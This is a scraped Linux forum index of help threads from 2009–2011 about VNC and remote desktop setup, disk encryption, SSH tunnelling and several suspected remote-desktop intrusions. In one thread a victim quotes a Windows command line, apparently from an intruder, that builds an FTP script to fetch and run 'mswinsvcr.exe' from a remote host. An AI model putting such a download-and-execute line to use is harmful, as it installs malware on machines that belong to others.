Fedora Security :: Entire System Had Been Hijacked The Remote Desktop Icon Was Active There Was A Message In Gnote Saying "youve Been Own3d"?
Jan 11, 2010
was home when the attack took place I was running a vnc server that was tunnled thru ssh. At approximatley 5:00 pm eastern time my box turned on firefox and flashed a popup. I tried to get to the logs and then realized that the entre system had been hijacked the remote desktop icon was active there was a message in gnote saying "youve been own3d". The system Is a old mac mini PPC system and i plan on looking at the system log with a netboot cd by running linux rescue at boot. my question is how do i gain access to the system log from a rescue cd to find out how much damage this hacker did?
View 4 Replies
ADVERTISEMENT
Jul 11, 2009
I recently installed Fedora 11 64bit and I am curious about encrypting my entire file system for security purposes. I've been on Google for a while now and I keep finding info on how to encrypt a specific folder or home directories but nothing on the entire file system (or I'm missing something big here). It's hard for me to imagine that it isn't. If so, do I need to encrypt the partition my file system is on before installing it? What software should I use? There seems to be so many, it's difficult to keep them all straight.
View 5 Replies
View Related
Jan 21, 2009
I need a FREE solution that can image an entire Luks system encrypted volume and the rest of the used HDD, the MBR and /boot partition. Note: MBR and /boot are not encrypted. Note 2: I want to be able to restore entire drive from image with only a couple of steps. Note 3: Destination HDD space is a factor. Image file must be compressed and the image file must be around 40 to 50 GB or less. The smaller the image the better.
I have used clonezilla live cd before but not for encrypted volumes. I know you can install it in Linux. But, I don't know how to configure it after installation. I would be very happy if someone could tell me how to configure clonezilla in Fedora. How to guides are also welcome. I have one more question. If I image the encrypted volumes and all the stuff I mentioned above while logged in to Fedora, and I restore the drive from the image, will the recovered drive still be encrypted?
View 8 Replies
View Related
Jul 22, 2009
Well this is my first time using redhat 7, the install went fine and webserver, mysql, phpmyadmin are all working......great
The only problem i have is the remote desktop
I have set the password in preferences/remote desktop run command vncpasswd and set password
In services vncserver i get this message......... xsetroot: unable to open display '' Xvnc is stopped and vncserver failed. The error was: xsetroot: unable to open display '' Shutting down VNC server: 1:user1[FAILED]
Starting VNC server: 1:user1 [FAILED]
My vncservers file looks like this
I have tried restarting service using root login and user1
View 5 Replies
View Related
Feb 27, 2010
I am trying to connect to my Company network through VPN. I use a Lynksys router which is most likely not the problem, as I can get the VPN and Remote Desktop to work from a WinXP Pro laptop connected to the same router. I have tried several RDC clients, none of them establish a connection. The VPN connection is active, I can ping and Traceroute to it , but I cannot get the RDC to work. The RDC should connect to 189.0.0.10 on the company network.
View 3 Replies
View Related
Jun 23, 2011
It always shows a same icon, for every application which shows message tray icon. I just did some shell extension work after fresh installation of F15, nothing related on message tray. Don't know how to change it back.Dose anyone knows how to customize message tray icon for gnome-shell?
View 2 Replies
View Related
Sep 8, 2010
I recently received an email from a friend without subject and just a link. Since we do that a lot, I clicked on it. I was taking to a website that looks like a phishing site and my computer hard drive started working feverishly. I closed it quickly.
First, I want you guys to be aware of this thing since it seems to be fairly new.
Second, I want to know if I have been compromised. I already changed the password on my gmail account and I accessed the site using Ubuntu and Firefox.
View 3 Replies
View Related
Nov 19, 2010
I was working over ubuntu 10.04 and while updating packages for my own purpose i needed to delete older versions of some packages. Unknowingly i deleted some packages it caused me to remove icons like rythmic sound box, video player, audio recorder and some more. Among those REMOTE DESKTOP icon also got removed from preferences. please suggest me how to get back those all into preferences. Is there any updates like making system to getback for default state
View 2 Replies
View Related
Jul 6, 2010
I always use VNC to check my server for updates, and this morning I started the xvnc4viewer to vnc into my server and it keep asking for a password. I never setup a password because I do this local from my laptop, and I am the only one who uses my laptop. I had to go to my server and check the setting in System > Preferences > Remote Desktop and found them all changed. There was a password setup and there was a check mark in the you must confirm each access to this machine there some security update that changed all these setting? Sometimes when I do updates I don't know what is being changed on my server
View 9 Replies
View Related
May 29, 2010
I have set up SSH and redirected the ssh server to listen on another port other than 22 for a bit of added security.
Now in hosts.deny I have:
ALL : ALL
In hosts.allow I have:
SSH : ip_address_of_client
I can no longer connect. I get the message: ssh_exchange_identification: Connection closed by remote host.
When I change hosts.allow to read:
ALL : ip_address_of_client
I can successfully connect the server.
However, I only want to allow SSH access in hosts.allow. What is the correct syntax?
I have tried and failed with each one of these:
SSH : ip_address:port_number
SSH2 : ipaddress
sshfwd-portnumber : ip_address_of_client
View 2 Replies
View Related
Mar 24, 2010
So I've read a bit and it seems that this is okay and secure. But I wanted to double check here with everyone, because I trust here more than just about anywhere. I've read about the hipporemote (which is pretty cool) and I have it working. Basically I want to make sure my system is still secure.
1. I had to open a port on my firewall for the VNC connection.
2. I turned on the Remote Desktop
2a. Checked Allow other users to view....
2b. Checked Allow other users to control....
2c. Checked You must confirm.....
2d. Checked for password, and put in a password
2e. Checked Configure network automatically to accept connectios
So with doing all of that, am I ok? I think so, especially since it says its only accessible on my local network. But I just wanted to hear from people who know more than I do that I don't need to worry any more than normal about others accessing my machine. I'm mainly thinking 2e, I don't fully understand what's going on there.
View 9 Replies
View Related
Apr 30, 2009
Hi I am running a fedora 10 desktop. when i send an email using evolution the message was not sent but returns a error message:"Error while performing operation.DATA command failedError: 550 Viagra SPAM - Hi in Subject" and the message did not have an attachment just plain words. what might have gone wrong for i have been using this for sometime without a problem. or what security measures should be in place to remove this viagra spamAm I infected by virus on this fedora, all my updates are up to date.
View 1 Replies
View Related
Jan 20, 2011
Which is the best remote linux hardening GUI tool.Is it possible to use that tool from windows system?
View 8 Replies
View Related
Aug 24, 2011
does anyone know the best way to encrypt an entire HD with both Fedora and Windows 7 on it already? At the very least I would want to encrypt the Linux partition, as that has the most sensitive stuff on it.
View 10 Replies
View Related
Mar 21, 2010
Today I noticed my Desktop was being controlled remotely from over the Internet even though I had it set for 'local network only'. Foolishly I relied on this setting and hadn't specified a password or other security. The remote user had opened my Firefox passwords page and was perusing this when I pulled the plug.
All external checks confirmed that my router/firewall is actively blocking correctly. How could this happen? How can I prevent this in the future? I had recently install the Firefox extension for Weave Sync and wonder if that had anything to do with it?
View 9 Replies
View Related
Nov 26, 2010
I just had a window pop up on my desktop saying my pc was being remotely controlled. Ubuntu 10.10The pc shutdown by itself, and I disconnected it from the net.I rebooted and uninstalled the remote desktop app.
View 7 Replies
View Related
Feb 16, 2010
I am attempting to set up a VNC with ssh tunneling for remote desktop between my laptop (opensuse 11.2) and my desktop (kubuntu karmic) and using the instructions here: [URL] and here: [URL] but I am having trouble getting remote desktop to work once I establish the ssh tunnel
I start out with
Code:
ssh <user@remotepc> -p <non22port> -L 5900:localhost:5900
That seems to wok and connect properly
The problem comes when I try to use a remote desktop client on the laptop to initiate the VPN desktop sharing and point it to
Code:
localhost:5900
Thats when I get a notification on the host saying:
Code:
Refused uninvited connection attempt from 127.0.0.1
And on the laptop I get:
Code:
VNC server closed connection
I have tried messing with the few settings in Krfb, but none seem to have any impact. How do I open localhost:5900 and allow VPN tunneling to the host machine?
View 2 Replies
View Related
Jun 5, 2011
I was sitting watching a TV show on the internet (streaming from channel 4) and all of a sudden I get a request from an unknown IP address, outside of my local network attempting to access my ubuntu desktop, I obviously declined straight away and stupidly didn't take note of the IP I've checked my firewall settings and no ports are being forwarded, everything is as it should be. I am running Ubuntu 11.04, and a little bit concerned. As of now I have completely disabled remote desktop on my laptop.
View 1 Replies
View Related
Aug 1, 2011
I have been using Remote desktop on Windows 7 to view and control my Ubuntu machine in the office quite happily over the office network. No problems there. I wanted to access it from my home connection so I read that I could do this by opening a port on the ubuntu machine's firewall. So I installed a firewall. Didnt see any way to open a port easily so I uninstalled it and installed another one. Same issue so I uninstalled that and then left it. I then tried to Remote Desktop the Ubuntu machine from my Windows 7 laptop and ERROR I can no longer connect.
View 6 Replies
View Related
Apr 27, 2010
I was working on my desktop under Ubuntu 9.10 when I got a message in the the upper right telling me that my Remote Desktop Connection had been activated. I don't know who it was, but they proceeded to open up a terminal and start typing a bunch of stuff. This scared the living @#$^ out of me, so I didn't really pay attention to what he was doing and immediately dove for the reset button. I disconnected my network from the web and found that RDC was NOT password protected.
Now, I probably did this a little while ago while I was playing around with it, but I also set up an account with dyndns.org. Would this possibly increase the number of attacks on my network? Just in case, I have removed my listing. Also, would any of this incident be logged somewhere? How/Where would I look to see if I'm being poked and prodded for another security hole?
View 6 Replies
View Related
Jul 8, 2011
Anyone know how device-mapper works, or can someone point me to any docco (other than the man page)?
Couple years ago I wrote a TrueCrypt wrapper script for use on Puppy Linux, and am reworking it for Ubuntu. Puppy sometimes didn't have the 'dmsetup' device-mapper utility available, but TrueCrypt still works without this when the '-m nokernelcrypto' option is used.
My script notices when dmsetup is available and skips this option. When the TC volume gets mounted (somehow using dmsetup), the Desktop icon is labled with the leaf name of the /media/mount_point -- so far, so good.
However, if I force the script to add the no-kernel-crypto option, and the TC volume is mounted without using dmsetup, the Desktop icon ls labled with the size of the volume. Say what?
Running df shows the difference between the two mounts is whether /dev/mapper is used. So *how is* dmsetup making this happen? The manpage isn't much help. Is it just the 'rename' sub-command? I am unable to find any details about this mechanism.
Code:
View 1 Replies
View Related
Oct 14, 2010
I have a home LAN server with Ubuntu Desktop edition 10.10 and I'm having a problem with remote desktop application. For now I have a monitor on that machine, but in the future it's gonna be only the box, without any periferal devices. When I try to log in via UltraVNC from Windows XP, on Ubuntu server a little window pops up, asking me to allow or refuse this "invader", so I click Allow and I really have full control on that machine. However, when I dont have any devices I wouldnt be able to click this Allow button, but will have to have full control. So, my question is how to autoclick this Allow button? Or when I try to log in the ubuntu machine, it would automatically give me full control?
View 5 Replies
View Related
Dec 30, 2010
host always ask password on 1st remote desktop (VNC) access Desktop version... how can I disable this?
View 2 Replies
View Related
Nov 1, 2010
Is there any way to do remote desktop from Mac (Snow Leopard) to Centos 5.5?I have turned on remote desktop in Centos and got the address ([url].....) to access remotely. Then I installed vnc-Viewer in my Mac. Put the address like (mypcname.com:0) then clicked connect. I get error message "Failed to connect: Operation timed out (60)".My Mac and Cenotos is in the same network.
View 4 Replies
View Related
Jul 20, 2010
I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing
Code:
%systemroot%system32cmd.exe
del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]
How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
View 9 Replies
View Related
Feb 15, 2011
I currently have Fedora running on it's own hard drive and I have two other drives in the same workstation I want to setup as Raid 0. Is this possible and what tool can I use to accomplish this? I have a feeling I might have to reinstall the entire system to accomplish this ...
View 2 Replies
View Related
Sep 10, 2010
Could you please help me to get the "Multiple Desktop Windows Icons" back on my KDE desktop panel?I accidentally disabled it by right clicking on bottom left of the panel and now i am not able to restore it back through System Setting > Multiple Desktop
View 2 Replies
View Related
Jun 26, 2011
I just installed Fedora 15 with the gnome desktop which looks like the android system for mobile phones, I installed wine which put the icons on my desktop but whenever I install a windows app it doesn't put an icon on my desktop for that particular application. How would I add an icon for those window apps so I can lunch them from the desktop, I don't know if you call that the desktop or just the program luncher either way how do I put an icon there so I can run those windows apps from there?
View 4 Replies
View Related
Dec 6, 2010
How to enable the remote desktop in a Red Hat system?
View 4 Replies
View Related
Jan 6, 2010
I have this network
desktop ultimate edition 2.4 (ubuntu 9.4)
laptop ubuntu 9.10
ethernet network
on ubuntu remote desktop is slow in general
on windows much faster !
is there anything special that I should do ?
View 5 Replies
View Related
